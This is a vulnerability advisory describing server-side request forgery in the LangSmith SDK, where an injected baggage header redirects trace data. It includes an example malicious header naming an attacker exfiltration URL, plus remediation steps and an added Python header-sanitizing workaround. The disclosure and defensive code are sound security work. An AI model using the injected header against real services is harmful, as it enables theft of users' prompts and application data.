Summary
The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary api_url values through the baggage header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.
Description
When using distributed tracing, the SDK parses incoming HTTP headers via RunTree.from_headers() in Python or RunTree.fromHeaders() in TypeScript. The baggage header can contain replica configurations, including api_url and api_key fields.
Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's post() and patch() methods send run data to all configured replica URLs, including any injected by an attacker.
Attack Vector
- Attacker sends an HTTP request to a vulnerable service with a malicious baggage header:
  baggage: langsmith-replicas=[{"api_url":"https://attacker.com/exfil","project_name":"x"}]
- The service parses the header via RunTree.from_headers(), storing the attacker's URL.
- When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to https://attacker.com/exfil.
Impact
- Data Exfiltration: Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers
- SSRF: Ability to make the server send requests to arbitrary URLs, potentially targeting internal services
Affected Use Cases
Applications are vulnerable if they:
- Use TracingMiddleware to automatically propagate tracing context
- Call RunTree.from_headers() / RunTree.fromHeaders() with untrusted HTTP headers
Remediation
Update to the patched versions:
- Python: pip install langsmith>=0.6.3
- JavaScript: npm install langsmith@>=0.4.6
The fix filters incoming replica configurations to an allowlist of safe fields, removing api_url, api_key, and other credential fields.
Workarounds
If unable to upgrade immediately:
- Strip or validate the baggage header before passing it to from_headers()
- Do not use TracingMiddleware with untrusted traffic
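The following is an added example of the first workaround, not code from the advisory or the LangSmith SDK: a header sanitizer that a service can run on incoming request headers before handing them to RunTree.from_headers(). It mirrors the shape of the fix described under Remediation by reducing every replica entry in the langsmith-replicas baggage member to an allowlist of fields. The allowlist itself is an assumption: the advisory only names project_name as a benign field, so that is the whole allowlist here; api_url, api_key and anything else unlisted is dropped. Member values are accepted either as the raw JSON shown in the advisory's example or percent-encoded as a W3C-style baggage header would normally carry them, and a member that cannot be parsed is dropped entirely rather than forwarded.

```python
from __future__ import annotations

import json
from typing import Optional
from urllib.parse import unquote

# Member name taken from the advisory's example header.
REPLICA_MEMBER = "langsmith-replicas"
# Assumed allowlist (not from the advisory): the only replica field the
# advisory shows as benign is project_name; everything else is stripped.
SAFE_REPLICA_FIELDS = frozenset({"project_name"})


def split_baggage_members(header: str) -> list[str]:
    """Split a baggage header on top-level commas only.

    The advisory's example embeds a raw JSON array in the value, so commas
    inside brackets, braces or JSON strings are not member separators.
    """
    members: list[str] = []
    current: list[str] = []
    depth, in_string, escaped = 0, False, False
    for ch in header:
        if in_string:
            current.append(ch)
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_string = False
            continue
        if ch == '"':
            in_string = True
        elif ch in "[{":
            depth += 1
        elif ch in "]}":
            depth = max(depth - 1, 0)
        elif ch == "," and depth == 0:
            members.append("".join(current))
            current = []
            continue
        current.append(ch)
    members.append("".join(current))
    return [m.strip() for m in members if m.strip()]


def sanitize_replicas(raw_value: str) -> tuple[Optional[str], list[str]]:
    """Reduce each replica entry to allowlisted fields.

    Returns (compact JSON of the cleaned list, names of dropped fields), or
    (None, []) when the value is not a JSON list in raw or percent-encoded form.
    """
    replicas = None
    for candidate in (raw_value, unquote(raw_value)):
        try:
            replicas = json.loads(candidate)
            break
        except ValueError:
            continue
    if not isinstance(replicas, list):
        return None, []
    cleaned: list[dict] = []
    dropped: list[str] = []
    for entry in replicas:
        if not isinstance(entry, dict):
            continue  # malformed entry: discard rather than forward
        kept = {k: v for k, v in entry.items() if k in SAFE_REPLICA_FIELDS}
        dropped.extend(k for k in entry if k not in SAFE_REPLICA_FIELDS)
        cleaned.append(kept)
    return json.dumps(cleaned, separators=(",", ":")), dropped


def sanitize_headers(headers: dict[str, str]) -> tuple[dict[str, str], list[str]]:
    """Return a copy of `headers` with replica endpoints/credentials removed
    from the baggage header, plus the names of everything that was removed.

    Header names match case-insensitively; other headers and unrelated
    baggage members pass through unchanged. A baggage header left with no
    members is deleted.
    """
    result = dict(headers)
    removed: list[str] = []
    for name, value in headers.items():
        if name.lower() != "baggage":
            continue
        kept_members: list[str] = []
        for member in split_baggage_members(value):
            key, _, member_value = member.partition("=")
            if key.strip().lower() != REPLICA_MEMBER:
                kept_members.append(member)
                continue
            cleaned, dropped = sanitize_replicas(member_value.strip())
            removed.extend(dropped)
            if cleaned is None:
                removed.append(REPLICA_MEMBER)  # unparseable: drop whole member
                continue
            kept_members.append(f"{REPLICA_MEMBER}={cleaned}")
        if kept_members:
            result[name] = ",".join(kept_members)
        else:
            del result[name]
    return result, removed
```

Call sanitize_headers() on the incoming request's headers and pass the returned dictionary, not the original, to RunTree.from_headers(); the returned list of removed field names is worth logging, since a request carrying api_url or api_key in its baggage is a signal that someone is probing for this issue.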
References